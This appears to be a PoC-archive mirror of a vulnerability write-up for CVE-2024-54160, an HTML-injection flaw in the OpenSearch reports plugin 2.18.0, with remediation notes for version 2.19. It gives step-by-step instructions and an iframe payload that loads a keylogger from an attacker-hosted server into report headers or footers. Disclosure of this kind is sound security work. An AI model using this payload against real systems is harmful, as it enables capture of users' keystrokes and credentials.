关联漏洞
介绍
# [CVE-2024-54160]-Opensearch-HTML-Injection
It was found that the Opensearch plugin called "reports" was vulnerable to HTML-injection in version 2.18.0.
The report functionality allowed users to store HTML in the header and footer while creating a new report definition.
Below is a quick proof of concept where I stored an iframe in the header functionality that fetched a JavaScript keylogger from my local machine which recorded the keys typed by the user.
# PoC
1. Edit the keylogger.html file and add a local IP which python3 http.server is running on.
2. Save the keylogger.html
3. Start the python3 server with "python3 -m http.server" in the same path as the keylogger.html file
4. Go to Reports
5. Fill the required fields
6. Select PDF
7. Enable header or footer
8. Enter the iframe payload -> ```<iframe src="http://<IP>:8000/keylogger.html">```
9. Click "Preview" - The keylogger should be loaded from the python server
10. Type something on the keyboard and watch the response in the python server
# Screenshot of the PoC in action
- The iframed content is rendered to the left (I know it's simple and ugly, but it works for a poc :) ).
- The logged keystrokes are shown to the right. (The keylogger PoC was not optimal since it missed some keystrokes though!)
# Remedial Action
This is remediated in Opensearch version 2.19, where the data passed in the footer/header functionality are sanitized with DOMpurify.
Release notes
https://github.com/opensearch-project/opensearch-build/blob/main/release-notes/opensearch-release-notes-2.19.0.md
# PR from Opensearch
https://github.com/opensearch-project/dashboards-reporting/pull/476
文件快照
[4.0K] /data/pocs/f1b095c37f1bc87b5e9751adbbd5cb8c9aad5859
├── [1.0K] keylogger.html
└── [1.7K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →